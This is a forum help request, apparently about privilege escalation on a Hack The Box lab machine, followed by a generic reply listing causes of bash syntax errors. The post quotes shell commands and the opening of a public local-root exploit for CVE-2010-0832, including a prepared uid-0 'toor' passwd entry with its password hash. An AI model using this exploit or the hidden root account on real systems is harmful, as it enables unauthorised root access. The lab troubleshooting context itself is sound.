Hi,
So as per the topic title I am attempting priv esc on popcorn after getting a shell as www-data.

I spawned what I think is a partially interactive shell with:

$ python -c ‘import pty; pty.spawn(“/bin/sh”)’

wget the exploit ‘14339.sh’ and made it executable with:

$ chmod +x 14339.sh

When I try and run the script without specifying the full paths to bash/the exploit with the following:

$ ./14339.sh

I get the following error:

/bin/sh: ./14339.sh: not found (I include this because I wonder if this might help explain why the exploit is failing).

So I run (and get the following response):

$ /bin/sh /var/www/torrent/upload/14339.sh
/bin/sh /var/www/torrent/upload/14339.sh
[*] Ubuntu PAM MOTD local root
$

When I run:

$ /bin/bash /var/www/torrent/upload/14339.sh

The following error is returned:

[*] Ubuntu PAM MOTD local root
'var/www/torrent/upload/14339.sh: line 39: syntax error near unexpected token { 'var/www/torrent/upload/14339.sh: line 39: backup() {

Basically the script is error’ing at the same point, bash gives a little bit more feedback.

Is this some sort of shell issue that I am not familiar with?

The script up to/after line 39 seems perfectly fine to me, but these problems are usually something simple I am missing. I have included it below

#!/bin/bash

Exploit Title: Ubuntu PAM MOTD local root

Date: July 9, 2010

Author: Anonymous

Software Link: http://packages.ubuntu.com/

Version: pam-1.1.0

Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)

CVE: CVE-2010-0832

Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i

References: Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1) - Linux local Exploit by Kristian Erik Hermansen

Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.

Does not prompt for login by creating temporary SSH key and authorized_keys entry.

user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh

[*] Ubuntu PAM MOTD local root

[*] Backuped /home/user/.ssh/authorized_keys

[*] SSH key set up

[*] Backuped /home/user/.cache

[*] spawn ssh

[+] owned: /etc/passwd

[*] spawn ssh

[+] owned: /etc/shadow

[*] Restored /home/user/.cache

[*] Restored /home/user/.ssh/authorized_keys

[*] SSH key removed

[+] Success! Use password toor to get root

Password:

root@ubuntu:/home/user# id

uid=0(root) gid=0(root) groupes=0(root)

P=‘toor:x:0:0:root:/root:/bin/bash’
S=‘toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::’
echo “[] Ubuntu PAM MOTD local root"
[ -z “$(which ssh)” ] && echo “[-] ssh is a requirement” && exit 1
[ -z “$(which ssh-keygen)” ] && echo “[-] ssh-keygen is a requirement” && exit 1
[ -z “$(ps -u root |grep sshd)” ] && echo “[-] a running sshd is a requirement” && exit 1
backup() {
[ -e “$1” ] && [ -e “$1”.bak ] && rm -rf “$1”.bak
[ -e “$1” ] || return 0
mv “$1”{,.bak} || return 1
echo "[] Backuped $1”
}

A “syntax error near unexpected token” message typically indicates that there is an issue with the syntax of a command or script. Here are some steps you can take to try to fix the issue:

Check for typos: The error message could be caused by a simple typo, such as a missing or extra character. Double-check the command or script for any mistakes.

Look for special characters: The error message could be caused by a special character that is not properly escaped. Check for characters such as quotes, backslashes, and parentheses and make sure they are properly escaped or enclosed in quotes if necessary.

Check for whitespace: The error message could be caused by incorrect spacing or indentation. Make sure that the command or script is properly formatted with correct whitespace.

Check for missing or extra semicolons or parentheses: The error message could be caused by a missing or extra semicolon or parentheses. Double-check the command or script for any missing or extra punctuation.

Regards,
Rachel Gomez